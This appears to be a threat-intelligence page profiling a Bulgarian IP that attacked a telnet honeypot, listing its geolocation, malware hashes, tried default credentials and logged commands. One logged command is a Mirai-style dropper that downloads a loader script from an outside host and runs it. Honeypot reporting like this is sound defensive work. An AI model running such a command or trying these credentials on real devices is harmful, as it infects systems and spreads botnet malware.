TROYANOSYVIRUS
Active ThreatMEDIUM

185.246.131.94

Country of Origin🇧🇬 BG
First Detection4/18/2026
Last Activity4/18/2026
ISPBrainStorm Network, Inc
🎯
113
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
2
Malware

Geolocation

Country
🇧🇬 BG
City
Sofia
ASN
AS136258
ISP
BrainStorm Network, Inc

Attack Types

ssh_telnet_honeypot

Attacked Ports

23

Associated Malware

9641be11c9ed0855a453...da41d24f215ed0146853...

Attempted Credentials

🔐root/password
7x
🔐root/(empty)
6x
🔐root/admin
6x
🔐root/root
5x

Executed Commands

$cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget https://tg-xxooxx888.8964.mom/loader.sh -O .x 2>/dev/null || curl -s https://tg-xxooxx888.8964.mom/loader.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x7x
$echo mirai7x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Risk Assessment

45
/100
LowMediumHighCritical